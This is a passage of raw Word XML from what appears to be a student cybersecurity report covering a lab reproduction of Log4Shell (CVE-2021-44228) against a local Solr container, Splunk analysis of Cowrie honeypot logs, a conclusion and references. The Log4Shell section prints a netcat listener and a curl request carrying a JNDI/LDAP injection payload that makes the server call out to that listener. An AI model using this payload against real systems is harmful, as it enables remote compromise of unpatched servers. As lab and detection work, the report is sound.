          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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nc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-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lvnp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9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6E789E" w14:textId="7CD539A1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 xml:space="preserve">Step 3 — Send a crafted JNDI/LDAP payload targeting the vulnerable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167E5C04" w14:textId="544F211A" w:rsidR="00FA7585" w:rsidRPr="005A0CD5" w:rsidRDefault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>curl 'http://127.0.0.1:8983/solr/admin/cores?action=$%7Bjndi:ldap://host.docker.internal:9001/a%7D'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3336AE28" w14:textId="07425332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Upon execution, the vulnerable Log4j library processed the crafted 'action' parameter and attempted to resolve the embedded JNDI/LDAP lookup, causing the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> server to initiate an outbound network connection back to the attacker-controlled listener — confirming successful exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A3B398" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRPr="005A0CD5" w:rsidRDefault="00FA7585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listening on [any] 9001 ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41179767" w14:textId="342DA729" w:rsidR="00FA7585" w:rsidRPr="005A0CD5" w:rsidRDefault="00FA7585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connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 48128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A49CF8" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRPr="00C7525D" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23DDFEE2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5.3 Execution Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1687EDFC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Deploy the vulnerable Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> / Log4j environment via Docker Compose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C193C4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Start a local listener to capture any outbound </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584EC162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Transmit a crafted JNDI/LDAP payload to the vulnerable API endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605DBE1E" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="005A0CD5" w:rsidRDefault="00000000" w:rsidP="00FA7585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="7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Confirm exploitation by observing an inbound connection on the listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075365DC" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="00C7525D" w:rsidRDefault="00000000">
      <w:r w:rsidRPr="00C7525D">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="25775E0C" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="00FA7585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FA7585">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6. SIEM Integration Using Splunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0E7384" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5FC3E1" w14:textId="17267976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6.1 Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EA808E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To centralize and analyze the data collected across both honeypot deployments, Splunk Enterprise (free tier) was installed locally and configured as a lightweight Security Information and Event Management (SIEM) platform. This enabled the project to move beyond static, script-based analysis toward interactive, query-driven investigation of the captured security event data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA69FDB" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRPr="00C7525D" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A529E22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6.2 Data Ingestion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8929F6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Splunk was installed and started using the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C1430E" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRPr="005A0CD5" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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dpkg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-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splunk.deb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="456349EA" w14:textId="66365C95" w:rsidR="00FA7585" w:rsidRPr="005A0CD5" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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sudo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/opt/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splunk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/bin/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splunk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 start --accept-license --run-as-root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA0C1CF" w14:textId="30C9B64C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The structured JSON log files from both the local and cloud honeypot deployments were uploaded into Splunk via its web-based data ingestion wizard, with each dataset assigned a distinct </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sourcetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>honeypot_local_attacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>honeypot_cloud_attacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) to allow independent and combined analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F0E930" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRPr="00C7525D" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4537EF73" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="00C7525D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7525D">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>6.3 Dashboard and Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE9F309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A combined SOC dashboard was built within Splunk, incorporating:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631D5518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An event-distribution panel comparing volume across honeypot data sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775655BA" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="005A0CD5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="70"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A statistics table quantifying successful compromise events across all monitored sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4623C2DF" w14:textId="7777777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Example Splunk Search Processing Language (SPL) query used to identify successful compromise events across sources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2216A274" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRPr="005A0CD5" w:rsidRDefault="00FA7585" w:rsidP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sourcetype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honeypot_local_attacks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"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eventid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cowrie.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>login.success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596312E8" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRPr="005A0CD5" w:rsidRDefault="00FA7585" w:rsidP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>OR (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sourcetype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honeypot_cloud_attacks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 xml:space="preserve">"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eventid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>="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cowrie.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>login.success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F67F11" w14:textId="48D93528" w:rsidR="00FA7585" w:rsidRPr="005A0CD5" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">| stats count by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sourcetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0EA98B26" w14:textId="7E8ED7B7" w:rsidR="008C6073" w:rsidRPr="005A0CD5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This centralized dashboard enabled analyst-style correlation across both honeypot deployments from a single interface, mirroring the workflow used by real-world Security Operations Center (SOC) analysts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194BDF0A" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="005A0CD5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB838E2" w14:textId="77777777" w:rsidR="008C6073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FA7585">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7574EB35" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRPr="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C6AFD0F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 xml:space="preserve">This project successfully demonstrates a complete, end-to-end cybersecurity monitoring and analysis workflow. The local Cowrie honeypot deployment provided a controlled environment for simulating realistic attacker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 xml:space="preserve">, while the cloud-based deployment on AWS captured genuine, unsolicited attacks from real-world internet sources — including successful unauthorized logins using weak and leaked credentials. The custom Python analysis pipeline transformed raw log data into actionable threat intelligence, identifying attack patterns, commonly targeted credentials, and post-exploitation </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>behaviour</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7B02D0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The reproduction and successful exploitation of CVE-2021-44228 (Log4Shell) against a real, vulnerable application further validated that the categories of attack technique observed on the honeypot correspond to genuine, high-severity risks present in production software. Finally, the integration of Splunk as a centralized SIEM platform enabled unified, query-driven analysis and visualization across both honeypot data sources, reflecting the tools and methodology used by professional Security Operations Center analysts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D27C1A6" w14:textId="77777777" w:rsidR="008C6073" w:rsidRPr="005A0CD5" w:rsidRDefault="00000000" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A0CD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Together, these components illustrate the complete security monitoring lifecycle — threat intelligence gathering, log analysis, vulnerability validation, and centralized detection — providing practical, hands-on experience with the technologies and workflows used throughout the cybersecurity industry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD6BE25" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B6258E5" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA57F66" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A6E6298" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0887BE34" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2585B991" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D7B32CD" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07C76B8D" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2636AECE" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="263F113B" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5E7FF6" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5913F202" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DE59990" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FECFCD9" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50BC6547" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46053F86" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31550C49" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74466A20" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="717059D9" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23A85AD1" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771906CE" w14:textId="77777777" w:rsidR="00FA7585" w:rsidRPr="00C7525D" w:rsidRDefault="00FA7585" w:rsidP="00FA7585">
      <w:pPr>
        <w:spacing w:after="140"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="293CE036" w14:textId="77777777" w:rsidR="008C6073" w:rsidRDefault="00000000" w:rsidP="00FA7585">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA7585">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>8. References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5321F2EB" w14:textId="77777777" w:rsidR="005A0CD5" w:rsidRPr="00FA7585" w:rsidRDefault="005A0CD5" w:rsidP="00FA7585">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="741EA8FC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59754E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cowrie SSH/Telnet Honeypot (official repo): </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="0059754E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://github.com/cowrie/cowrie</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0059754E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBB1B2F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Cowrie Documentation: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="009029E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://docs.cowrie.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009029E0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C2C395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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009029E0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulhub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009029E0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (vulnerable Docker environments): </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="009029E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://github.com/vulhub/vulhub</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009029E0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A51FDEA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Apache Log4j Security Vulnerabilities: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="009029E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://logging.apache.org/log4j/2.x/security.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009029E0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10898982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CVE-2021-44228 (Log4Shell) — NVD: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="009029E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2021-44228</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009029E0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064B130E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AWS Documentation: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="009029E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://docs.aws.amazon.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009029E0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2365D9FD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Splunk Documentation: </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="009029E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://docs.splunk.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009029E0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6180BC93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Docker Documentation: </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
